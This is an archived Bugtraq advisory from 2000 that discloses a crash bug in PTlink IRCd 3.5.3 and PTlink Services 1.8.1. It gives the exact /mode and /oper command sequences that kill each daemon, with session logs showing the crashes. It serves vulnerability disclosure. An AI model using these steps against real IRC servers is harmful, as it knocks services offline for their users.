Bugtraq mailing list archives
Vulnerablity in PTlink3.5.3ircd + PTlink.Services.1.8.1...
From: egocentric coder <wildcoyote_db () HOTMAIL COM>
Date: Sun, 26 Nov 2000 23:58:42 -0000
PTlink3.5.3 IRCD + PTlink.Services1.8.1
Advisory
by wildcoyote [lms () ispgaya pt]
Hi!
I'm wildcoyote and i recently found a bug on the PTlink IRCD [3.5.3] + it's
services [1.8.1].
It is possible to kill the ircd and it's services...
To do so, you must:
[Crash Services] -
Connect to the irc server...
Then, do the following:
Issue a
/mode <your nick> +owgscfxeb
and a
/oper <oper nick> <something, doesnt really matter>
command!
This will cause the server to:
/mode <your nick> +owgscfxeb
[23:25] *** whocares sets mode: +wgsx
/oper <oper nick> <something, doesnt really matter>
-
Password Incorrect
-
[23:25] -freddy.userfriendly- Your attempt has been logged.
-
[23:26] -freddy.userfriendly- *** Notice -- Connection to
services.freddy.userfriendly[*@192.168.0.3] activated.
-
[23:26] -freddy.userfriendly- *** Notice -- Lost connection to
services.freddy.userfriendly[192.168.0.3]:Broken pipe
-
[root@freddy wildcoyote]# ps aux | grep services
[root@freddy wildcoyote]#
[Crash ircD] -
Connect to the irc server...
Then, do the following:
Issue a
/oper <oper nick> <something, doesnt really matter>
and a
/mode <your nick> +owgscfxeb
command!
This will cause the server to:
[23:43] -NickServ- This nickname is registered and protected. If it is your
-
[23:43] -NickServ- nick, type /NickServ IDENTIFY password. Otherwise,
-
[23:43] -NickServ- please choose a different nick.
-
[23:43] -NickServ- If you do not change within one minute, your nick will be
changed.
/oper wildcoyote whocares
-
Password Incorrect
-
[23:43] -freddy.userfriendly- Your attempt has been logged.
/mode mynick +owgscfxeb
-
[23:44] *** Disconnected
[root@freddy wildcoyote]# ps aux | grep ircd
[root@freddy wildcoyote]#
And..that's it for today kids :]
Regardz,
Luis Miguel Silva
aka wildcoyote aka wC
http://www.unsecurity.org/ Member
http://www.lonoss.org/ Member
http://www.ispgaya.pt/ Student
_____________________________________________________________________________________
Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com
Current thread:
- Vulnerablity in PTlink3.5.3ircd + PTlink.Services.1.8.1... egocentric coder (Nov 28)
- Re: Vulnerablity in PTlink3.5.3ircd + PTlink.Services.1.8.1... Joao Seabra (Nov 29)
- Re: Vulnerablity in PTlink3.5.3ircd + PTlink.Services.1.8.1... Gustavo Felisberto (Nov 29)